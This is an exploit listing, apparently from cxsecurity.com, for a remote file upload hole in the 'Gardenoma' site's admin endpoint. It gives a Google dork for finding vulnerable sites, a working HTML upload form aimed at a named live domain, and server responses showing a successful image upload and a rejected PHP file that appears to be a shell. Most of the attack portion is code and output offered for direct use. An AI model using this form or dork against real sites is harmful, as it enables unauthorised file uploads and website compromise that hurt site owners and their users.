Gardenoma Remote File Upload Vulnerability

2018.06.11
id Mr.T959 (ID) id
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

# Exploit Title: Gardenoma Remote File Upload Vulnerability # Google Dork: intext:gardenoma happy planting. # Exploit Author: Mr.T959 # Author Website : http://mr-t959.xyz # Tested on: Windows 7 -------------------------------------- # Exploit HTML Code : <form method='post' target='_blank' action='http://gardenoma.com/admin/server/php/' enctype='multipart/form-data'> <input type='file' name='files[]'><input type='submit' name='g' value='Upload Cok!'></form> # Exploit admin/server/php/ # Successful {"files":[{"name":"e.jpg","size":5362,"type":"image\/jpeg","title":null,"description":null,"url":"http:\/\/gardenoma.com\/admin\/server\/php\/files\/\/e.jpg","mediumUrl":"http:\/\/gardenoma.com\/admin\/server\/php\/files\/\/medium\/e.jpg","thumbnailUrl":"http:\/\/gardenoma.com\/admin\/server\/php\/files\/\/thumbnail\/e.jpg","deleteUrl":"http:\/\/gardenoma.com\/admin\/server\/php\/?file=e.jpg&_method=DELETE","deleteType":"POST","id":1688}]}<br /> <b>Warning</b>: Unknown: The session id is too long or contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in <b>Unknown</b> on line <b>0</b><br /> <br /> <b>Warning</b>: Unknown: Failed to write session data (files). Please verify that the current setting of session.save_path is correct (/tmp) in <b>Unknown</b> on line <b>0</b><br /> # Error {"files":[{"name":"geo.php","size":3468,"type":"application\/octet-stream","error":"Filetype not allowed"}]} # Demo http://gardenoma.com/admin/server/php/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top